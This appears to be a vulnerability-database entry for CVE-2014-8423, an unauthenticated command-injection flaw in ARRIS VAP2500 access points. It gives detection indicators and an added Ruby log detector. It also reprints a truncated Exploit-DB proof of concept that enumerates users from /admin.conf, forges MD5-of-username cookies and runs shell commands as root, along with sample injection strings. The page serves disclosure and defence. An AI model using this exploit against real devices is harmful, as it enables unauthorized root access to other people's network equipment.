CVE-2014-8423
Published: 2014-11-28
CVE-2014-8423: Unspecified vulnerability in the management portal in ARRIS VAP2500 before FW08.41 allows remote attackers to execute arbitrary commands via unknown vectors.
Priority: P1 (80) · Severity: critical · CVSS 2.0 base score: 10.0
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C (network, low complexity, no authentication required, complete confidentiality, integrity and availability impact)
Exploit: public exploit code available (Exploit-DB PoC and Metasploit module, below)
EPSS: 62.48% (99.1st percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arris | vap2500_firmware | < 08.41 (indexed range listed <= 08.41) | FW08.41 (per the CVE text: "before FW08.41") |
Detection & IOCs (extracted from the indexed sources)
Detection:
- Detect unauthenticated GET requests to /admin.conf; the file leaks valid usernames from the device management portal and is the first step of the public exploit.
- Detect POST requests to /tools_command.php carrying a Cookie header of the form p=<32-char hex string>, i.e. the MD5 of a username. This cookie is the authentication bypass: no password or server-issued session is involved.
- Alert on POST body parameters containing txt_command= sent to /tools_command.php; the value is passed to the device shell (OS command injection).
- Monitor for telnet being re-enabled on the device: look for POSTs to /tools_command.php whose body contains telnet-disabled or S42inetd.
Caveats:
- The authentication bypass only works if at least one valid username exists on the device; the public exploit enumerates usernames from /admin.conf before attempting command execution, so a lone /admin.conf read is a strong precursor signal.
- The vulnerability affects ARRIS VAP2500 devices running firmware versions prior to FW08.41; patched devices should not be exploitable via this vector, but the indicators above still identify scanning and exploitation attempts against them.
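The four indicators above, combined into one detector and run over constructed access-log lines (this is an added example, not code from the page or from the exploit author). The tab-separated log format (client IP, method, path, Cookie header, body) is an assumption; adapt parse_line to whatever your proxy or IDS exports. Passing the device's known account names lets the detector confirm a forged p= cookie instead of only flagging its shape, and it marks hits that follow an /admin.conf read from the same source.

```ruby
#!/usr/bin/env ruby
# Added example: detector for the VAP2500 indicators listed above.
require 'digest/md5'

# 'p' cookie value: 32 hex chars (MD5 of a username); uppercase tolerated.
MD5_COOKIE = /(?:^|;\s*)p=([0-9a-f]{32})(?:;|$)/i
# Tokens the telnet re-enable indicator keys on.
TELNET_RE  = /telnet-disabled|S42inetd/

# [name, severity, predicate over a parsed request]
INDICATORS = [
  ['admin.conf user leak', 'medium',
   ->(r) { r[:method] == 'GET' && r[:path] == '/admin.conf' }],
  ['md5-cookie auth bypass', 'high',
   ->(r) { r[:path] == '/tools_command.php' && r[:cookie] =~ MD5_COOKIE }],
  ['tools_command.php command injection', 'critical',
   ->(r) { r[:method] == 'POST' && r[:path] == '/tools_command.php' &&
           r[:body].include?('txt_command=') }],
  ['telnet re-enable attempt', 'critical',
   ->(r) { r[:path] == '/tools_command.php' && r[:body] =~ TELNET_RE }],
]

# Assumed log format (constructed for this example):
# ip<TAB>method<TAB>path<TAB>cookie-header<TAB>request-body
def parse_line(line)
  ip, method, path, cookie, body = line.chomp.split("\t", 5)
  { ip: ip, method: method, path: path, cookie: cookie.to_s, body: body.to_s }
end

def match_indicators(req)
  INDICATORS.select { |_, _, test| test.call(req) }.map { |name, sev, _| [name, sev] }
end

# Returns one alert hash per indicator hit. known_users (optional) are the
# device's real account names; if the cookie equals MD5 of one of them the
# bypass is confirmed rather than merely suspected.
def scan(lines, known_users = [])
  leaked = Hash.new(false)   # source IPs that have already read /admin.conf
  alerts = []
  lines.each do |line|
    req = parse_line(line)
    hits = match_indicators(req)
    if (m = req[:cookie].match(MD5_COOKIE)) &&
       known_users.any? { |u| Digest::MD5.hexdigest(u) == m[1].downcase }
      hits << ['cookie matches MD5 of a known username', 'critical']
    end
    hits.each do |name, sev|
      alerts << { ip: req[:ip], path: req[:path], name: name, severity: sev,
                  after_leak: leaked[req[:ip]] }
    end
    leaked[req[:ip]] = true if hits.any? { |n, _| n == 'admin.conf user leak' }
  end
  alerts
end

# Constructed sample traffic: one attacker (10.0.0.5) following the PoC flow,
# one benign client (10.0.0.9). The command strings are illustrative only.
SAMPLE_LOG = [
  "10.0.0.5\tGET\t/admin.conf\t\t",
  "10.0.0.5\tPOST\t/tools_command.php\tp=#{Digest::MD5.hexdigest('admin')}\t" \
    "cmb_header=&txt_command=whoami",
  "10.0.0.5\tPOST\t/tools_command.php\tp=#{Digest::MD5.hexdigest('admin')}\t" \
    "cmb_header=&txt_command=grep telnet-disabled /etc/inetd.conf; ls /etc/init.d/S42inetd",
  "10.0.0.9\tGET\t/index.html\tPHPSESSID=abc123\t",
]

if __FILE__ == $0
  scan(SAMPLE_LOG, ['admin']).each do |a|
    tail = a[:after_leak] ? ' (after /admin.conf read from same source)' : ''
    puts "[#{a[:severity]}] #{a[:ip]} #{a[:path]} #{a[:name]}#{tail}"
  end
end
```

Running it against the sample yields eight alerts: the /admin.conf read, then three hits on the first command POST (cookie shape, txt_command, confirmed MD5 of "admin") and four on the second (the telnet indicator added), all but the first marked as following a leak. Feed it real logs only after confirming the device actually exposes these paths; a p= cookie of 32 hex characters on other products is not by itself evidence.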
No detection rules found.
Exploit-DB
Arris VAP2500 - Authentication Bypass (exploitdb, 2014-11-25; indexed under CVE-2014-8425)
---
```ruby
#!/usr/bin/env ruby
# Exploit-DB PoC as indexed on this page. The source is truncated after the
# root-privilege check; only the script is closed here so that it runs, the
# missing tail (which used new_pass) is not reconstructed.
require 'net/http'
require 'digest/md5'

if !ARGV[0]
  puts "Usage: #{$0} <host>"
  exit(0)
end

host = ARGV[0]
new_pass = "h4x0r3d!"   # consumed by the truncated remainder of the original PoC
http = Net::HTTP.new(host).start

# /admin.conf is served without authentication and lists accounts one per
# line as "username,..."; keep only the username field of each line.
users = http.request_get("/admin.conf").body.split("\n").map! { |user| user.sub(/^(.*?),.*$/, "\\1") }
if users.empty?
  puts "[!!!] could not find any user accounts. exiting."
  exit(-1)
end
puts "[*] found user accounts: #{users.inspect}"
puts "[*] checking for root privs"

# Authentication bypass: a cookie p=md5(username) is accepted as a session.
# txt_command on /tools_command.php is executed by the device shell, so
# "whoami" tells us which account runs commands as root.
root_privs = nil
users.each do |user|
  resp = http.request_post("/tools_command.php", "cmb_header=&txt_command=whoami",
                           { "Cookie" => "p=#{Digest::MD5.hexdigest(user)}" })
  if resp.body =~ /root/
    puts "[*] root privs found: #{user}"
    root_privs = user
    break
  end
end

if !root_privs
  puts "[!!!] could not find a root privileged account. exiting."
  exit(-1)
end
# [remainder of the original PoC is truncated at the source]
```
Metasploit
Arris VAP2500 tools_command.php Command Execution (metasploit)
Arris VAP2500 access points are vulnerable to OS command injection in the web management portal via the tools_command.php page. Though authentication is required to access this page, it is trivially bypassed by setting the value of a cookie to an md5 hash of a valid username.
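Why an MD5-of-username cookie is no authentication at all, shown as a small model beside a hardened session check. This is an added example reconstructed from the behaviour the exploit relies on, not the VAP2500 firmware's actual PHP and not the Metasploit module's code: the vulnerable check accepts any cookie equal to the MD5 of an existing account name, so anyone who can read /admin.conf can mint a valid cookie without ever seeing a password. The hardened version issues a random server-side token only after a password check and compares secrets in constant time; its SHA-256 password hash is a placeholder for a real slow, salted hash such as bcrypt.

```ruby
require 'digest/md5'
require 'digest/sha2'
require 'securerandom'

# Model of the check implied by the exploit (assumed, not the device's code):
# the 'p' cookie is valid if it equals MD5 of any account name. Nothing secret
# goes into the cookie, so it is forgeable from public information.
def vulnerable_authenticated?(cookie, usernames)
  usernames.any? { |u| cookie == Digest::MD5.hexdigest(u) }
end

# Attacker side: exactly what the PoC above does once it knows a username.
def forge_cookie(username)
  Digest::MD5.hexdigest(username)
end

# Constant-time byte comparison so a password or token check does not leak
# how many leading bytes matched through response timing.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Hardened form: sessions exist only server side, tokens are random, and the
# token never encodes anything an attacker could derive.
class SessionStore
  # Placeholder for the model; use bcrypt/scrypt/Argon2 in a real system.
  def self.password_hash(password)
    Digest::SHA256.hexdigest(password)
  end

  def initialize
    @sessions = {}   # token => username
  end

  # credentials: { username => password_hash }. Returns a token or nil.
  def login(username, password, credentials)
    stored = credentials[username]
    return nil unless stored && constant_time_equal?(stored, SessionStore.password_hash(password))
    token = SecureRandom.hex(32)   # 256 bits of entropy, unguessable
    @sessions[token] = username
    token
  end

  def authenticated?(token)
    token.is_a?(String) && @sessions.key?(token)
  end
end

if __FILE__ == $0
  users = ['admin', 'guest']                       # as leaked by /admin.conf
  puts "vulnerable check accepts forged cookie: #{vulnerable_authenticated?(forge_cookie('admin'), users)}"
  store = SessionStore.new
  creds = { 'admin' => SessionStore.password_hash('correct horse') }
  puts "hardened check accepts forged cookie:   #{store.authenticated?(forge_cookie('admin'))}"
  tok = store.login('admin', 'correct horse', creds)
  puts "hardened check accepts real session:    #{store.authenticated?(tok)}"
end
```

The detection bullets above follow directly from the model: because the cookie is a pure function of the username, defenders can compute the expected value for every known account and match it exactly, which is what lets a network sensor confirm a bypass attempt rather than merely suspect it.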
No writeups or analysis indexed.